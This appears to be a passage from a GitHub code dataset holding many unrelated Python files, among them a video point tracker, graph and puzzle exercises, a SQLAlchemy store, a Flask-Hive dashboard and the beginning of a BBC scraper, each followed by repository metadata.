frames. write to colored tracked video\n    # https://stackoverflow.com/questions/55904418/draw-text-inside-circle-opencv\n    for point in trackpoints:\n        cv2.circle(frame, (int(point['x']), int(point['y'])), 3, RED, -1) # pylint: disable=no-member\n\n    if frame_label is not None:\n        text = str(frame_label)\n        WHITE = (255,255,255)\n        text_size, _ = cv2.getTextSize(text, TEXT_FACE, TEXT_SCALE, TEXT_THICKNESS)\n        text_origin = ( TEXT_MARGIN, height-TEXT_MARGIN)\n        cv2.rectangle(frame, text_origin, (text_origin[0]+text_size[0],text_origin[1]-text_size[1]), RED, -1)\n        cv2.putText(frame, text, text_origin, TEXT_FACE, TEXT_SCALE, WHITE, TEXT_THICKNESS, cv2.LINE_4)\n\n\ndef extract_frame(*, movie_data, frame_number, fmt):\n    \"\"\"Write movie_data to a temporary file, find frame_number and return it in the requested fmt.\n    \"\"\"\n    with tempfile.NamedTemporaryFile(mode='ab') as tf:\n        tf.write(movie_data)\n        tf.flush()\n        cap = cv2.VideoCapture(tf.name)\n\n    # skip to frame_number (first frame is #0)\n    for fn in range(frame_number+1):\n        ret, frame = cap.read()\n        if not ret:\n            return None\n        if fn==frame_number:\n            if fmt=='CV2':\n                return frame\n            elif fmt=='jpeg':\n                with tempfile.NamedTemporaryFile(suffix='.jpg',mode='w+b') as tf:\n                    cv2.imwrite(tf.name, frame, [int(cv2.IMWRITE_JPEG_QUALITY), 90])\n                    tf.seek(0)\n                    return tf.read()\n            else:\n                raise ValueError(\"Invalid fmt: \"+fmt)\n    raise RuntimeError(\"invalid frame_number\")\n\ndef track_movie(*, engine_name, engine_version=None, moviefile_input, input_trackpoints, moviefile_untracked=None, moviefile_output, frame_start=0):\n    \"\"\"\n    Summary - takes in a movie file and writes an annotated movie with red dots on all the trackpoints.\n    Draws frame numbers on each frame\n    :param: engine_name - the engine to use. 
CV2 is the only supported engine at the moment.\n :param: moviefile_input - file name of an MP4 to track. Must not be annotated. CV2 cannot read movies from memory; this is a known problem.\n :param: moviefile_output - file name of the tracked output, with annotations.\n :param: trackpoints - a list of dictionaries {'x', 'y', 'label', 'frame_number'} to track. Those before frame_start will be copied to the output.\n :param: frame_start - the frame to start tracking out (frames 0..(frame_start-1) are just copied to output)\n :return: dict 'output_trackpoints' = [frame][pt#][0], [frame][pt#][1]\n\n \"\"\"\n if engine_name!=Engines.CV2:\n raise RuntimeError(f\"Engine_name={engine_name} engine_version={engine_version} but this only runs with CV2\")\n\n cap = cv2.VideoCapture(moviefile_input)\n ret, current_frame = cap.read()\n\n # should be movie name + tracked\n\n # Get video properties\n width = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))\n height = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\n fps = cap.get(cv2.CAP_PROP_FPS)\n\n # Create a VideoWriter object to save the output video\n fourcc = cv2.VideoWriter_fourcc(*'mp4v')\n out = cv2.VideoWriter(moviefile_output, fourcc, fps, (width, height))\n\n output_trackpoints = []\n for frame_number in range(1_000_000):\n prev_frame = current_frame\n ret, current_frame = cap.read()\n if not ret:\n break\n\n # Get the trackpoints for the current frame if this was previously tracked or is the first frame to track\n if frame_number <= frame_start:\n current_trackpoints = [tp for tp in input_trackpoints if tp['frame_number']==frame_number]\n\n # If this is a frame to track, then track it\n if frame_number >= frame_start:\n current_trackpoints = cv2_track_frame(frame0=prev_frame, frame1=current_frame, trackpoints=current_trackpoints)\n\n # Label the output and write it\n cv2_label_frame(frame=current_frame, trackpoints=current_trackpoints, frame_label=frame_number)\n out.write(current_frame)\n\n # Add the trackpionts to the output list, giving each a frame number\n output_trackpoints.extend( [ {**tp, **{'frame_number':frame_number}} for tp in current_trackpoints] )\n cap.release()\n out.release()\n return {'output_trackpoints':output_trackpoints}\n\n\n# The trackpoint is at (138,86) when the image is scaled to a width: 320 height: 240\n\nif __name__ == \"__main__\":\n # the only requirement for calling track_movie() would be the \"control points\" and the movie\n parser = argparse.ArgumentParser(description=\"Run Track movie with specified movies and initial points\",\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n parser.add_argument('--engine',default='CV2')\n parser.add_argument(\n \"--moviefile\", default='tests/data/2019-07-12 circumnutation.mp4', help='mpeg4 file')\n parser.add_argument(\n \"--points_to_track\", default='[{\"x\":138,\"y\":86,\"label\":\"mypoint\"}]', help=\"list of points to track as json 2D array.\")\n parser.add_argument('--outfile',default='tracked_output.mp4')\n args = parser.parse_args()\n\n # Get the trackpoints\n trackpoints = json.loads(args.points_to_track)\n # Make sure every trackpoint is for frame 0\n trackpoints = [ {**tp,**{'frame_number':0}} for tp in trackpoints]\n\n res = track_movie(engine_name=args.engine, moviefile_input=args.moviefile, input_trackpoints=trackpoints, moviefile_output=args.outfile)\n print(\"results:\")\n 
print(json.dumps(res,default=str,indent=4))\n","repo_name":"Plant-Tracer/webapp","sub_path":"tracker.py","file_name":"tracker.py","file_ext":"py","file_size_in_byte":8201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"16016920168","text":"\"\"\"\nDijkstra\n\n1. 출발 노드 설정\n2. 최단 거리 테이블 초기화\n3. 방문하지 않은 노드 중에서 최단 거리가 가장 짧은 노드를 선택\n4. 해당 노드를 거쳐 다른 노드로 가는 비용을 계산하고 최단 거리 테이블 갱신\n5. 3,4 반복\n\"\"\"\n\nimport sys\ninput = sys.stdin.readline\nINF = int(1e9)\n\nn, m = map(int, input().split())\n\nstart = int(input())\n\ngraph = [[] for _ in range(n + 1)]\n\nvisited = [False] * (n + 1)\n\ndistance = [INF] * (n + 1)\n\nfor _ in range(m):\n a, b, c = map(int , input().split())\n graph[a].append((b, c))\n\ndef get_smallest_node():\n min_value = INF\n index = 0\n for i in range(1, n+1):\n if distance[i] < min_value and not visited[i]: # 방문하지 않은 노드 중에서 거리가 가장 작은 노드\n min_value = distance[i]\n index = i\n return index\n\ndef dijkstra(start):\n distance[start] = 0\n visited[start] = True\n for j in graph[start]: # start node와 연결된 node들의 거리 비용 초기화\n distance[j[0]] = j[1]\n \n for i in range(n - 1):\n now = get_smallest_node()\n visited[now] = True\n\n for j in graph[now]:\n cost = distance[now] + j[1]\n if cost < distance[j[0]]:\n distance[j[0]] = cost\n\ndijkstra(start)\n\nfor i in range(1, n + 1):\n if distance == INF:\n print(\"INFINITY\")\n else:\n print(distance[i])\n \n \n","repo_name":"BCAA-Algorithm-Study/algorithm-study","sub_path":"book/ch09/chj/9-1.py","file_name":"9-1.py","file_ext":"py","file_size_in_byte":1449,"program_lang":"python","lang":"ko","doc_type":"code","stars":4,"dataset":"github-code","pt":"5"} +{"seq_id":"29705819064","text":"# -*- coding:utf-8 -*-\n__author__ = 'nathan'\n\nimport collections\n\nfrom .base import BaseStore\nfrom sqlalchemy.sql import text, select, and_, or_, func\nfrom sqlalchemy import MetaData\nfrom ..utils.dt import get_day_range\n\nclass DatabaseStore(BaseStore):\n \"\"\"\n It stands for a table or a sql result\n \"\"\"\n\n def __init__(self, engine, table, schema=None, columns=None, where=None, split_by=None):\n \"\"\"\n create a new DatabaseStore, which stand for a table from a rdbms\n\n Parameters:\n - `engine`: the sqlalchemy engine instance\n - `schema`: database schema\n - `table`: the table that needs to be synced\n _ `columns`: the column that needs to be synced, it should be str(one column),\n comma split str(multi columns) or a list of str\n - `where`: a where clouse, only the condition\n - `split_by`: when sync the table concurrently, which cloumn should it be splitted by\n\n \"\"\"\n self.__engine = engine\n self.__schema = schema\n self.__table = table\n self.__splits = None\n self.__columns = self._format_columns(columns)\n self.__where = self._format_where(where)\n self.__split_by = split_by if split_by is not None else self._get_split_by()\n\n def sql(self):\n return str(self.__select())\n\n def _format_columns(self, columns):\n \"\"\"\n format comma split str, list or python iterable to text wrapped list\n\n Arguments:\n - `columns`: a list or python iterable, or comma split str\n \"\"\"\n if isinstance(columns, str):\n return (text(col) for col in columns.strip().split(\",\"))\n else:\n return (text(col) for col in columns) \\\n if columns is not None and len(columns) > 0 \\\n else [text(\"*\")]\n\n def _format_where(self, where):\n \"\"\"\n format where closure\n \"\"\"\n where = \"\" if where is None else where\n return where\n\n def _select_all(self):\n \"\"\"\n select all table\n 
\"\"\"\n        sel = select([text(\"*\")]).select_from(text(self.__table))\n        return sel\n\n\n    def _select_incr(self,create_column, create_start_time, create_end_time, update_column, update_start_time, update_end_time):\n        sel = select([text(\"*\")]).where(\n            or_(text(\"%s between '%s' and '%s'\" % (create_column, create_start_time, create_end_time)),\n                text(\"%s between '%s' and '%s'\" % (update_column, update_start_time, update_end_time)))\n        ).select_from(text(self.__table))\n\n        return sel\n\n    def _select(self):\n        \"\"\"\n        select the table with the given columns and where clause\n        \"\"\"\n        sel = select(self.__columns).\\\n            where(text(self.__where)).\\\n            select_from(text(self.__table))\n        return sel\n\n    def _select_with_split_by(self, start, end):\n        # the columns are already text-wrapped, and the statement must be returned\n        sel = select(self.__columns).\\\n            where(\n                and_(\n                    text(self.__where),\n                    text(\":split_by >= :start\"),\n                    text(\":split_by < :end\"),\n                )\n            ).\\\n            select_from(text(self.__table)).params(split_by=self.__split_by, start=start, end=end)\n        return sel\n\n    def _count(self):\n        sel = select([func.count(text(\"1\"))]).\\\n            where(text(self.__where)).\\\n            select_from(text(self.__table))\n        return self.__engine.execute(sel).fetchone()[0]\n\n    def count(self):\n        if not hasattr(self, 'rownums'):\n            self.rownums = self._count()\n        return self.rownums\n\n    __len__ = count\n\n    def __iter__(self):\n        # a generator-based __iter__ replaces the previous broken\n        # __iter__/__next__ pair, which yielded from inside __next__\n        result = self.__engine.execute(self._select())\n        for row in result:\n            yield collections.OrderedDict((key.lower(), row[key]) for key in row.keys())\n\n    def get_split(self):\n        pass\n\n    def get(self, partition=None):\n        if partition is None:\n            partition = self._select()\n        result = self.__engine.execute(partition)\n        for row in result:\n            yield collections.OrderedDict((key.lower(), row[key]) for key in row.keys())\n\n    def put(self, iterable):\n        for row in iterable:\n            # TODO: the data should be inserted into the database\n            self.__engine.insert(row)\n\n    def get_local(self, local_path, merge=False):\n        pass\n\n    def _get_split_by(self):\n        meta = MetaData()\n        meta.reflect(bind=self.__engine)\n        _table = meta.tables[self.__table]\n\n        primary_keys = _table.primary_key.columns\n        if len(primary_keys) == 1:\n            return primary_keys.keys()[0].lower()\n        else:\n            return None\n\n    def _get_columns(self):\n        meta = MetaData()\n        meta.reflect(bind=self.__engine)\n        _table = meta.tables[self.__table]\n\n        keys = _table.columns.keys()\n        return (key.lower() for key in keys)\n\n    def _get_split_by_upper_boundary(self, rownums_per_split, low_boundary=None):\n        where = \"\" if low_boundary is None else self.__split_by + \" >= \" + str(low_boundary)\n\n        sel = select(self.__columns).\\\n            where(\n                and_(\n                    text(self.__where),\n                    text(where)\n                )\n            ).\\\n            order_by(self.__split_by).offset(rownums_per_split).limit(1).\\\n            select_from(text(self.__table))\n\n        # upper_boundary\n        row = self.__engine.execute(sel).fetchone()\n\n        if row is not None:\n            lowered_row = collections.OrderedDict((key.lower(), row[key]) for key in row.keys())\n            return lowered_row[self.__split_by]\n\n    def _get_split_by_boundaries(self, split_nums):\n        \"\"\"\n        return like [(None, 2), (2, 3), (3, None)]\n        \"\"\"\n\n        low_boundary = None\n        rownums_per_split = self.count()/split_nums\n\n        boundaries = list()\n        for i in range(split_nums):\n            if i == split_nums - 1:\n                boundaries.append((low_boundary, None))\n                break\n\n            upper_boundary = self._get_split_by_upper_boundary(rownums_per_split, low_boundary)\n            boundaries.append((low_boundary, upper_boundary))\n            low_boundary = upper_boundary\n\n        return boundaries\n\n    def split(self, 
split_nums=1):\n        \"\"\"\n\n        Arguments:\n        - `split_nums`: if split_nums = 1, means no need to split, return the whole sql\n        \"\"\"\n        if 1 < split_nums <= self.count():\n            boundaries = self._get_split_by_boundaries(split_nums)\n            return boundaries\n        else:\n            return self.sql()\n\n    def all(self):\n        connection = self.__engine.connect()\n        result = connection.execute(self._select_all())\n        for row in result:\n            yield collections.OrderedDict((key.lower(), row[key]) for key in row.keys())\n\n    def incr_by_day(self):\n        starttime, endtime = get_day_range()\n        columns = self._get_columns()\n\n        if 'createtime' in columns:\n            create_column = 'createtime'\n            update_column = 'updatetime'\n        else:\n            create_column = 'create_datetime'\n            update_column = 'update_datetime'\n\n        res = self.__engine.execute(\n            self._select_incr(create_column=create_column, create_start_time=str(starttime),\n                              create_end_time=str(endtime), update_column=update_column,\n                              update_start_time=str(starttime), update_end_time=str(endtime)))\n\n        for record in res:\n            yield record\n\n    def incr_by_hour(self):\n        pass\n","repo_name":"zhoubangtao/dbsync","sub_path":"dbsync/stores/rdbms.py","file_name":"rdbms.py","file_ext":"py","file_size_in_byte":7605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"}
+{"seq_id":"29474285576","text":"# Setup detectron2 logger\nimport detectron2\nfrom detectron2.utils.logger import setup_logger\n\nsetup_logger()\n\nimport json\nimport os\nimport random\n\nimport cv2\nimport deepdisc\nimport numpy as np\nfrom deepdisc.data_format.image_readers import DC2ImageReader\n\n\ndef flatten_dc2_stamps(ddicts, image_reader, key_mapper):\n    \"\"\"Reads in large cutouts and creates postage stamp images centered on individual objects with i<25.3.\n    Flattens these images+metadata into one tabular dataset.
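Only objects brighter than i = 25.3 whose full 128x128 stamp fits inside the cutout are kept.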
Ignores segmentation maps.\n\n Parameters\n ----------\n ddicts : list[dicts]\n The metadata dictionaries for large cutouts with multiple objects.\n\n Returns\n -------\n flattened_data : np array\n The images + metadata that have now been flattened into a tabular array.\n Each row has 98317 columns (6x128x128 + 13 metadata values)\n \"\"\"\n\n i = 0\n images = []\n metadatas = []\n\n for d in ddicts:\n filename = d[f\"filename\"]\n for a in d[\"annotations\"]:\n new_dict = {}\n new_dict[\"image_id\"] = 1\n new_dict[\"height\"] = 128\n new_dict[\"width\"] = 128\n\n x = a[\"bbox\"][0]\n y = a[\"bbox\"][1]\n w = a[\"bbox\"][2]\n h = a[\"bbox\"][3]\n\n xnew = x + w // 2 - 64\n ynew = y + h // 2 - 64\n\n if (\n xnew < 0\n or ynew < 0\n or xnew + 128 > d[\"height\"]\n or ynew + 128 > d[\"height\"]\n or a[\"mag_i\"] > 25.3\n ):\n continue\n\n bxnew = x - (x + w // 2 - 64)\n bynew = y - (y + h // 2 - 64)\n\n key = key_mapper(d)\n\n image = image_reader(key)\n image = np.transpose(image, axes=(2, 0, 1))\n\n imagecut = image[:, ynew : ynew + 128, xnew : xnew + 128]\n\n images.append(imagecut.flatten())\n\n metadata = [\n 128,\n 128,\n 6,\n i,\n bxnew,\n bynew,\n w,\n h,\n 1,\n a[\"category_id\"],\n a[\"redshift\"],\n a[\"obj_id\"],\n a[\"mag_i\"],\n ]\n metadatas.append(metadata)\n i += 1\n\n images = np.array(images)\n metadatas = np.array(metadatas)\n\n flattened_data = []\n for image, metadata in zip(images, metadatas):\n flatdat = np.concatenate((image, metadata))\n flattened_data.append(flatdat)\n\n flatdat = np.array(flattened_data)\n flatdatnostars = flatdat[flatdat[:, -3] > 0]\n\n return flatdatnostars\n\n\ndef flatten_dc2_large(ddicts, key_mapper, image_reader):\n images = []\n for d in ddicts:\n fn = key_mapper(d)\n image = image_reader(fn)\n image = np.transpose(image, axes=(2, 0, 1))\n images.append(image.flatten())\n return np.array(images)\n","repo_name":"LSSTDESC/rail_deepdisc","sub_path":"src/rail/deepdisc/flatten.py","file_name":"flatten.py","file_ext":"py","file_size_in_byte":2909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"39873082942","text":"#Direction words: north, south, east, west, down, up, left, right, back.\r\n#Verbs: go, stop, kill, eat.\r\n#Stop words: the, in, of, from, at, it\r\n#Nouns: door, bear, princess, cabinet.\r\n#Numbers: any string of 0 through 9 characters.\r\n\r\nlex = {}\r\nlex.update(dict.fromkeys(['north','east','west','down','south','up','left','right','back'], 'direction'))\r\nlex.update(dict.fromkeys(['take','go','kill','eat','stop','hide','enter','exit','pickup','grab','leave', 'search', 'look','type'], 'verb'))\r\nlex.update(dict.fromkeys(['the','in','of','from','at','it','through','to'], 'stop'))\r\nlex.update(dict.fromkeys(['door','princess','cabinet','bear','closet','scalpel','doorway', 'Escape', 'Office', 'Weaponry', 'pistol', 'machine', 'grenade','escape', 'office', 'computer', 'file', 'weaponry','room'],'noun'))\r\n\r\ndef convert_number(s):\r\n try:\r\n return int(s)\r\n except ValueError:\r\n return None\r\ndef scan(stuff): \r\n words = stuff.split()\r\n sentence = []\r\n for x in words:\r\n if x in lex:\r\n word = (lex[x], x)\r\n sentence.append(word)\r\n elif convert_number(x) != None:\r\n word = ('number', int(x))\r\n sentence.append(word)\r\n else:\r\n word = ('error', x)\r\n sentence.append(word)\r\n return 
sentence\r\n\r\n","repo_name":"jvandebroek/Python-Learning","sub_path":"ex50/Game/lexicon.py","file_name":"lexicon.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"41609903157","text":"import cgi\n\nfrom google.appengine.api import users\nfrom google.appengine.ext import webapp\nfrom google.appengine.ext.webapp.util import run_wsgi_app\nfrom google.appengine.ext import db\n\nclass Userinfo(db.Model):\n author = db.UserProperty()\n content = db.StringProperty()\n loc_lat = db.StringProperty()\n loc_long = db.StringProperty()\n date = db.DateTimeProperty(auto_now_add=True)\n\nclass MainPage(webapp.RequestHandler):\n def get(self):\n self.response.out.write('')\n self.response.out.write(\"\"\"\n
<form action=\"/GID/sign\" method=\"post\">\n
<div><textarea name=\"content\" rows=\"3\" cols=\"60\"></textarea></div>\n
<div>latitude: <input type=\"text\" name=\"latitude\"></div>\n
<div>longitude: <input type=\"text\" name=\"longitude\"></div>\n
<div><input type=\"submit\" value=\"Sign\"></div>\n</form>\n</body>\n</html>\n
\n \n \"\"\")\n\nclass Guestbook(webapp.RequestHandler):\n def post(self):\n userinfo = Userinfo(key_name=self.request.get('content'))\n\n if users.get_current_user():\n userinfo.author = users.get_current_user()\n\n userinfo.content = self.request.get('content')\n userinfo.loc_lat = self.request.get('latitude')\n userinfo.loc_long = self.request.get('longitude')\n userinfo.put()\n self.redirect('/GID/')\n\n\"\"\"class Latitude(webapp.RequestHandler):\n def post(self):\n userinfo = Userinfo()\n\n if users.get_current_user():\n userinfo.author = users.get_current_user()\n\n userinfo.loc_lat = self.request.get('latitude')\n userinfo.put()\n self.redirect('/GID/')\n\nclass Longitude(webapp.RequestHandler):\n def post(self):\n userinfo = Userinfo()\n\n if users.get_current_user():\n userinfo.author = users.get_current_user()\n\n userinfo.loc_long = self.request.get('longitude')\n userinfo.put()\n self.redirect('/GID/')\n\"\"\"\napplication = webapp.WSGIApplication(\n [('/GID/', MainPage),\n ('/GID/sign', Guestbook),\n# ('/GID/loc_lat', Latitude),\n# ('/GID/loc_long', Longitude)\n ],\n debug=True)\n\ndef main():\n run_wsgi_app(application)\n\nif __name__ == \"__main__\":\n main()","repo_name":"ProjPossibility/ss12-gps-child-tracker","sub_path":"ss12-gps-child-tracker/ss12-gps-child-tracker-pysrv/io.py","file_name":"io.py","file_ext":"py","file_size_in_byte":2490,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"26860173069","text":"#!/usr/bin/env python3\n\nimport itertools\nimport os\nimport sys\n\nsys.path.append(os.path.join('..', 'intcode'))\n\nimport intcode\n\nwith open(sys.argv[1]) as f:\n line = f.readline().strip()\n memory = [int(x) for x in line.split(',')]\n\nmax_signal = None\nfor phases in itertools.permutations([0, 1, 2, 3, 4]):\n signal = 0\n for i in range(5):\n inputs = [phases[i], signal]\n program = intcode.Program(memory, input_values = inputs)\n program.run()\n signal = program.outputs[0]\n if max_signal is None or signal > max_signal:\n print('Phases {} produced signal {}'.format(phases, signal))\n max_signal = signal\n","repo_name":"pak21/aoc2019","sub_path":"07/07.py","file_name":"07.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"43334061249","text":"# Write a Python code to calculate LCM of (25,55)\nnum1, num2 = 25, 55\n\n# To choose the greater number\nif (num1 > num2):\n greater = num1\nelse:\n greater = num2\n\nwhile(True):\n # To find LCM\n if(greater % num1 == 0 and greater % num2 == 0):\n print('The LCM of', num1, 'and', num2, 'is', greater)\n break\n greater += 1\n","repo_name":"anilmhrzn/PythonTrainingAssignment","sub_path":"assingment1/Ques5.py","file_name":"Ques5.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"18832809473","text":"'''\nfinding the Kth smallest element from the array using quick select which is based on quich sort DS.\n'''\n####NOTE, I'THINK THAT IT IS QUICK SELECT ALGO, BUT IT MAY BE EVEN BETTER\n\nclass quickSelect:\n def __init__(self, arr, k):\n self.arr = arr\n self.k = k\n self.total = 0\n self.quickMod()\n print(\"answer: \", self.answer)\n\n def quickMod(self):\n lastQs = None\n self.answer = None\n while True:\n lastQs = self.sorter(self.arr)\n print(\"self.total: \", self.total)\n if lastQs[\"middle\"] == True:\n self.answer = lastQs[\"main\"]\n break\n else:\n if 
lastQs[\"right\"] == True:\n self.total = self.total + 1 #bcz, main element will also be counted now\n self.arr = lastQs[\"rightArr\"]\n else:\n self.total = self.total - len(lastQs[\"leftArr\"])\n self.arr = lastQs[\"leftArr\"]\n\n def sorter(self, elements):\n ln = len(elements)\n qs = {\n \"main\": None,\n \"leftArr\": [],\n \"rightArr\": [],\n \"middle\": False,\n \"left\": False,\n \"right\": False\n }\n if ln == 0:\n return qs\n qs[\"main\"] = elements[ln-1]\n if ln == 1:\n qs[\"middle\"] = True\n return qs\n for i in range(0, ln-1):\n if elements[i] <= qs[\"main\"]:\n qs[\"leftArr\"].append(elements[i])\n self.total = self.total + 1\n else:\n qs[\"rightArr\"].append(elements[i])\n\n if self.total == self.k - 1:\n qs[\"middle\"] = True\n elif self.total > self.k - 1:\n qs[\"left\"] = True\n elif self.total < self.k - 1:\n qs[\"right\"] = True\n\n return qs\n\nquickSelect([5, 9, 10, 1, 3, 8, 12, 7], 3)","repo_name":"shubhamsinghrathi/algorithms","sub_path":"array/quickSelect.py","file_name":"quickSelect.py","file_ext":"py","file_size_in_byte":1905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"42162141141","text":"from flask import *\n\napp = Flask(__name__)\nfrom pyhive import hive\n\nconn = hive.Connection(host='192.168.10.201', port=10000, username='root', database='spark')\ncursor = conn.cursor()\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef home_page():\n cursor.execute(\"select success, faile from spark.ads_sucess_faile_num\")\n chart1_data = list(cursor)\n print(chart1_data)\n\n cursor.execute(\"select days, pv, uv from spark.ads_pv_uv_num\")\n chart4_data = [[], [], []]\n for line in list(cursor):\n chart4_data[0].append(line[0])\n chart4_data[1].append(line[1])\n chart4_data[2].append(line[2])\n print(chart4_data)\n\n cursor.execute(\"select * from spark.ads_class_sucess_faile_num\")\n tmp = list(cursor)\n # print(tmp)\n chart_class = []\n if len(tmp) == 0:\n chart_class.append(('117010801', 0, 0))\n chart_class.append(('117010802', 0, 0))\n elif len(tmp) == 1 and tmp[0][0] == '117010801':\n chart_class.append(tmp[0])\n chart_class.append(('117010802', 0, 0))\n elif len(tmp) == 1 and tmp[0][0] == '117010802':\n chart_class.append(('117010801', 0, 0))\n chart_class.append(tmp[0])\n else:\n chart_class = tmp\n # chart_class = list(cursor)\n # tmp = []\n # if chart_class[0][0] == '117010801' and chart_class[0][1] != '117010802':\n # tmp.append(chart_class[0])\n # tmp.append(('117010802', 0, 0))\n # elif chart_class[0][0] != '117010801' and chart_class[0][1] != '117010802':\n # tmp.append(('117010801', 0, 0))\n # tmp.append(('117010802', 0, 0))\n # elif chart_class[0][0] == '117010802':\n # tmp.append(('117010801', 0, 0))\n # tmp.append(chart_class[1])\n print(chart_class)\n\n cursor.execute(\"select * from spark.ads_code_sucess_faile_num\")\n chart3_data = [[], [], []]\n for line in list(cursor):\n chart3_data[0].append(line[0])\n chart3_data[1].append(line[1])\n chart3_data[2].append(line[2])\n print(chart3_data)\n\n cursor.execute(\n \"select userid,student_name,class_id,code_number,job_success_distinct_number from spark.ads_student_sort_chart1_table1 limit 5\")\n tmp = list(cursor)\n table_left = []\n if len(tmp) == 0:\n table_left.append(('-', '-', '-', 0, 0))\n else:\n table_left = tmp\n print(table_left)\n\n cursor.execute(\n \"select userid,student_name,class_id,code_number,job_success_distinct_number from spark.ads_student_sort_table2 limit 5\")\n table_right = list(cursor)\n print(table_right)\n\n 
return render_template('home_page.html', chart1_data=chart1_data, chart4_data=chart4_data, chart_class=chart_class,\n chart3_data=chart3_data, table_left=table_left, table_right=table_right)\n\n\n@app.route('/chart1', methods=['GET', 'POST'])\ndef chart1():\n cursor.execute(\"select * from spark.ads_student_sort_chart1_table1\")\n data = list(cursor)\n\n return render_template(\"chart1.html\", data=data)\n\n\n@app.route('/chart2', methods=['GET', 'POST'])\ndef chart2():\n cursor.execute(\"select userid,student_name,class_id,academy,profession,submit_number,code_number,day \"\n \"from spark.dws_student_summary_f where class_id='117010801'\")\n data = list(cursor)\n\n return render_template(\"chart2.html\", data=data)\n\n\n@app.route('/chart3', methods=['GET', 'POST'])\ndef chart3():\n cursor.execute(\"select * from spark.ads_code_chart3\")\n data = list(cursor)\n\n return render_template(\"chart3.html\", data=data)\n\n\n@app.route('/chart4', methods=['GET', 'POST'])\ndef chart4():\n cursor.execute(\"select * from spark.ads_pv_uv_num\")\n data = list(cursor)\n\n return render_template(\"chart4.html\", data=data)\n\n\n@app.route('/chart5', methods=['GET', 'POST'])\ndef chart5():\n cursor.execute(\"select userid,student_name,class_id,academy,profession,submit_number,code_number,day \"\n \"from spark.dws_student_summary_f where class_id='117010802'\")\n data = list(cursor)\n\n return render_template(\"chart5.html\", data=data)\n\n\n@app.route('/chart6', methods=['GET', 'POST'])\ndef chart6():\n cursor.execute(\"select * from spark.ads_student_sort_table2\")\n data = list(cursor)\n\n return render_template(\"chart6.html\", data=data)\n\n\nif __name__ == \"__main__\":\n app.run(debug=True, port=30001, host='192.168.10.4')\n","repo_name":"cyf-99/spark-On-Kubernetes","sub_path":"main_hive.py","file_name":"main_hive.py","file_ext":"py","file_size_in_byte":4308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"27045998362","text":"class Solution:\n def intToRoman(self, num: int) -> str:\n roman = ''\n symb_dict = {1000: 'M', 900: 'CM', 500: 'D', 400: 'CD', 100: 'C', 90: 'XC', 50: 'L', 40: 'XL', 10: 'X', 9: 'IX',\n 5: 'V', 4: 'IV', 1: 'I'}\n for i in symb_dict.keys():\n while num >= i:\n num -= i\n roman += symb_dict[i]\n return roman\n\n\nprint(Solution().intToRoman(3999))\n","repo_name":"XinweiChai/leetcode_problems","sub_path":"python/problem12.py","file_name":"problem12.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"22460734561","text":"class Solution:\n def numIslands(self, grid: List[List[str]]) -> int:\n \"\"\" DFS approach.\n Time: O(n)\n Space: O(n)\n \"\"\"\n if not grid or not grid[0]:\n return 0\n \n size_r = len(grid)\n size_c = len(grid[0])\n counts = 0\n visited = set()\n\n def dfs(r, c):\n if (r, c) in visited:\n return 0\n \n visited.add((r, c))\n if grid[r][c] == '0':\n return 0\n \n for n_r, n_c in get_moves(r, c):\n dfs(n_r, n_c)\n return 1\n \n def get_moves(r, c):\n dirs = [(0, 1), (0, -1), (1, 0), (-1, 0)]\n res = []\n for d_r, d_c in dirs:\n n_r, n_c = r + d_r, c + d_c\n if n_r >= 0 and n_r < size_r and n_c >= 0 and n_c < size_c:\n res.append((n_r, n_c))\n return res\n \n for row in range(size_r):\n for col in range(size_c):\n counts += dfs(row, col)\n return 
counts","repo_name":"hsuanhauliu/leetcode-solutions","sub_path":"medium/number-of-islands/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"7839815131","text":"# for loop\nfor i in range(10):\n print(i)\n\n# range() :-\n# it actually creates a list which for loop iterates over\n# 3 parametes, start, stop, step\n\nlist = [1, 2, 3, 4, 5]\n\nfor elem in list: \n print(elem)\n\nfor i in range(len(list)):\n print(i)\n\nfor i, elem in enumerate(list):\n print(i, elem)\n\n\n\n### While Loop\n\ni = 0\nwhile i < 10:\n print(i)\n i += 1","repo_name":"yousafsabir/python","sub_path":"loops.py","file_name":"loops.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"8403773815","text":"import re\nfrom datetime import datetime\nimport sys\nimport urlparse\nimport lxml.html\nimport urllib2\n\nimport site\nsite.addsitedir(\"../pylib\")\nfrom BeautifulSoup import BeautifulSoup, Comment\nfrom JL import ukmedia, ScraperUtils\n\n\n\n\n\n\ndef Extract( html, context, **kw ):\n art = context\n parser = lxml.html.HTMLParser(encoding='utf-8')\n doc = lxml.html.document_fromstring(html, parser, base_url=art['srcurl'])\n\n #BBC has more than one layout...\n if len(doc.cssselect('article.story'))>0:\n return extract_sports(art,doc)\n\n\n og_type = doc.cssselect('head meta[property=\"og:type\"]')\n if len(og_type)>0:\n foo = og_type[0].get('content')\n if foo != u'article':\n ukmedia.DBUG2(\"SKIP og:type '%s' %s\\n\" % (foo,art['srcurl']))\n return None\n\n article = doc.cssselect('.story-body')[0]\n\n h1 = 